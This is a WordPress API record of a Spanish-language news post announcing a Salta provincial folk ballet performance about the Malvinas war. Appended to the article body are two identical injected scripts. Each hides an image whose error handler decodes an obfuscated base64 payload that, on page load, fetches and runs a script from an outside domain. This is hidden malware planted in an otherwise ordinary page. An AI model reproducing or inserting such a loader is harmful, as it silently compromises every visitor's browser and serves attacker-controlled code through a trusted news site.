{"id":3061,"date":"2023-09-05T10:35:28","date_gmt":"2023-09-05T13:35:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3061"},"modified":"2025-08-14T00:09:06","modified_gmt":"2025-08-14T03:09:06","slug":"el-ballet-folklorico-de-la-provincia-se-presentara-manana-en-el-municipio-de-general-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3061","title":{"rendered":"El Ballet Folkl\u00f3rico de la Provincia se presentar\u00e1 ma\u00f1ana en el municipio de General G\u00fcemes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7f083e\"><em>\u00abLa \u00faltima carta\u00bb, una obra ovacionada por los y las j\u00f3venes ser\u00e1 parte del Programa en el marco de las actividades previstas por la Elecci\u00f3n de la Reina Provincial de los Estudiantes.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<strong>Ballet Folkl\u00f3rico de la Provincia<\/strong>&nbsp;\u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d se prepara para su pr\u00f3xima presentaci\u00f3n: \u201cLa \u00faltima Carta\u201d, que tendr\u00e1 lugar ma\u00f1ana&nbsp;6 de septiembre a 21&nbsp;horas en la Centro Cultural 13 de Febrero de la localidad de G\u00fcemes, en el marco de las actividades previstas por la Elecci\u00f3n de la Reina Provincial de los Estudiantes.<\/p>\n\n\n\n<p>Con coreograf\u00eda de su director titular Mtro. Daniel Espoz, y del core\u00f3grafo Germ\u00e1n Bonetto como director invitado, presentar\u00e1n esta obra que evoca historias de nuestros h\u00e9roes de Malvinas.<\/p>\n\n\n\n<p>\u201cLA \u00daLTIMA CARTA\u201d es una obra que narra a trav\u00e9s de la danza, el teatro y el arte, uno de los momentos m\u00e1s crueles de la historia nacional argentina, la guerra por las Islas Malvinas. Una madre, una esposa, amigos que despiden a aquel muchacho de tan solo dieciocho a\u00f1os notificado en Marzo de 1982 como uno de los soldados que viajar\u00eda a defender la Patria. Entre la inocencia propia de su edad, entre el dolor y miedo al vivir la realidad, aquel h\u00e9roe ca\u00eddo en combate, en alg\u00fan momento de esos 74 d\u00edas le escribe a su madre sin saber que ser\u00eda la \u00faltima carta que hasta el d\u00eda de hoy, ella no deja de leer.<\/p>\n\n\n\n<p>Una herida que nos condena, decenas de historias que no pudimos escuchar, cientos de familias que siguen esperando el reconocimiento de aquellos familiares \u201cSolo reconocido por Dios\u201d, porque es una deuda que se les debe, porque es el respeto que se merecen ellos, nuestros H\u00e9roes de Malvinas.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ballet-folklorico-de-la-provincia-se-presentara-maniana-en-el-municipio-de-general-guemes-91590\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00abLa \u00faltima carta\u00bb, una obra ovacionada por los y las j\u00f3venes ser\u00e1 parte del Programa en el marco de las actividades previstas por la Elecci\u00f3n de la Reina Provincial de los Estudiantes. El&nbsp;Ballet Folkl\u00f3rico de la Provincia&nbsp;\u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d se prepara para su pr\u00f3xima presentaci\u00f3n: \u201cLa \u00faltima Carta\u201d, que tendr\u00e1 lugar ma\u00f1ana&nbsp;6 de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3061","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3061"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3061"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3061\/revisions"}],"predecessor-version":[{"id":6973,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3061\/revisions\/6973"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3062"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3061"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3061"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3061"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}